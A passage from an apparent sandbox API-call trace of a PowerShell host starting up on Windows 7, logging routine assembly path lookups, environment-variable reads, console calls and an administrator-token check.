lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0134.137] GetLastError () returned 0x2 [0134.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0134.137] GetLastError () returned 0x2 [0134.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0134.348] GetLastError () returned 0x2 [0134.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0134.348] GetLastError () returned 0x2 [0134.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.486] GetLastError () returned 0xcb [0134.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.486] GetLastError () returned 0xcb [0134.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.487] GetLastError () returned 0xcb [0134.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.487] GetLastError () returned 0xcb [0134.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.565] GetLastError () returned 0xcb [0134.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x2de64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0134.681] GetLastError () returned 0x2 [0134.681] SetErrorMode (uMode=0x1) returned 0x1 [0134.681] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x2deaf4 | out: lpFileInformation=0x2deaf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.681] GetLastError () returned 0x2 [0134.681] SetErrorMode (uMode=0x1) returned 0x1 [0135.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.198] GetLastError () returned 0x0 [0135.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.198] GetLastError () returned 0x0 [0135.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.199] GetLastError () returned 0x0 [0135.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.201] GetLastError () returned 0xcb [0135.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.204] GetLastError () returned 0xcb [0135.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.205] GetLastError () returned 0xcb [0135.233] CoCreateGuid (in: pguid=0x2debd4 | out: pguid=0x2debd4*(Data1=0x8de05926, Data2=0x3d89, Data3=0x4475, Data4=([0]=0x90, [1]=0x84, [2]=0xe9, [3]=0x2, [4]=0x5b, [5]=0x31, [6]=0x60, [7]=0xf))) returned 0x0 [0135.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.241] GetLastError () returned 0xcb [0135.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.243] GetLastError () returned 0xcb [0135.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.244] GetLastError () returned 0xcb [0135.282] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0135.282] GetLastError () returned 0x0 [0135.284] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x2deab4 | out: lpConsoleScreenBufferInfo=0x2deab4) returned 1 [0135.284] GetLastError () returned 0x0 [0135.288] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0135.325] GetLastError () returned 0x0 [0135.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x2deab4 | out: lpConsoleScreenBufferInfo=0x2deab4) returned 1 [0135.325] GetLastError () returned 0x0 [0135.326] GetVersionExW (in: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0135.326] GetLastError () returned 0x0 [0135.327] GetCurrentProcess () returned 0xffffffff [0135.327] GetLastError () returned 0x3f0 [0135.328] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2deac4 | out: TokenHandle=0x2deac4*=0x340) returned 1 [0135.328] GetLastError () returned 0x3f0 [0135.331] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2deb1c | out: TokenInformation=0x0, ReturnLength=0x2deb1c) returned 0 [0135.331] GetLastError () returned 0x7a [0135.332] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f62a0 [0135.332] GetLastError () returned 0x7a [0135.332] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x3f62a0, TokenInformationLength=0x4, ReturnLength=0x2deb1c | out: TokenInformation=0x3f62a0, ReturnLength=0x2deb1c) returned 1 [0135.332] GetLastError () returned 0x7a [0135.335] DuplicateTokenEx (in: hExistingToken=0x340, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x2dead4 | out: phNewToken=0x2dead4*=0x338) returned 1 [0135.335] GetLastError () returned 0x7f [0135.335] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2deb1c | out: TokenInformation=0x0, ReturnLength=0x2deb1c) returned 0 [0135.335] GetLastError () returned 0x7a [0135.335] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6280 [0135.335] GetLastError () returned 0x7a [0135.335] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x3f6280, TokenInformationLength=0x4, ReturnLength=0x2deb1c | out: TokenInformation=0x3f6280, ReturnLength=0x2deb1c) returned 1 [0135.335] GetLastError () returned 0x7a [0135.336] CheckTokenMembership (in: TokenHandle=0x338, SidToCheck=0x2c73540*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2deab0 | out: IsMember=0x2deab0) returned 1 [0135.336] GetLastError () returned 0x7a [0135.336] CloseHandle (hObject=0x338) returned 1 [0135.336] GetLastError () returned 0x7a [0135.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.336] GetLastError () returned 0x7a [0135.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.336] GetLastError () returned 0x7a [0135.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.336] GetLastError () returned 0x7a [0135.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.337] GetLastError () returned 0x7a [0135.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.367] GetLastError () returned 0x7a [0135.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.367] GetLastError () returned 0x7a [0135.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.367] GetLastError () returned 0x7a [0135.452] GetConsoleTitleW (in: lpConsoleTitle=0x3d2e10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.452] GetLastError () returned 0x7a [0135.551] GetConsoleTitleW (in: lpConsoleTitle=0x3d2e10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.551] GetLastError () returned 0x7a [0135.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.551] GetLastError () returned 0x7a [0135.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.551] GetLastError () returned 0x7a [0135.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.551] GetLastError () returned 0x7a [0135.556] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0135.556] GetLastError () returned 0x7a [0135.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.556] GetLastError () returned 0x7a [0135.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.557] GetLastError () returned 0x7a [0135.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.557] GetLastError () returned 0x7a [0135.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.557] GetLastError () returned 0x7a [0135.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.597] GetLastError () returned 0x7a [0135.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.597] GetLastError () returned 0x7a [0135.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.597] GetLastError () returned 0x7a [0135.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.597] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de608, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.598] GetLastError () returned 0x7a [0135.663] SetConsoleCtrlHandler (HandlerRoutine=0x29e384a, Add=1) returned 1 [0135.663] GetLastError () returned 0x7a [0135.677] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338 [0135.677] GetLastError () returned 0x0 [0135.678] CoCreateGuid (in: pguid=0x2deae8 | out: pguid=0x2deae8*(Data1=0x746a1c71, Data2=0xd299, Data3=0x4ba9, Data4=([0]=0x8e, [1]=0x6d, [2]=0xf0, [3]=0x5d, [4]=0xa7, [5]=0xd2, [6]=0xad, [7]=0xc5))) returned 0x0 [0135.823] WinSqmIsOptedIn () returned 0x0 [0135.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.824] GetLastError () returned 0xcb [0135.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.852] GetLastError () returned 0xcb [0135.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.853] GetLastError () returned 0xcb [0135.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.857] GetLastError () returned 0xcb [0135.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.858] GetLastError () returned 0xcb [0135.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.861] GetLastError () returned 0xcb [0135.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.863] GetLastError () returned 0xcb [0135.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.864] GetLastError () returned 0xcb [0135.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.867] GetLastError () returned 0xcb [0135.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.916] GetLastError () returned 0xcb [0135.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.918] GetLastError () returned 0xcb [0135.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.919] GetLastError () returned 0xcb [0138.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 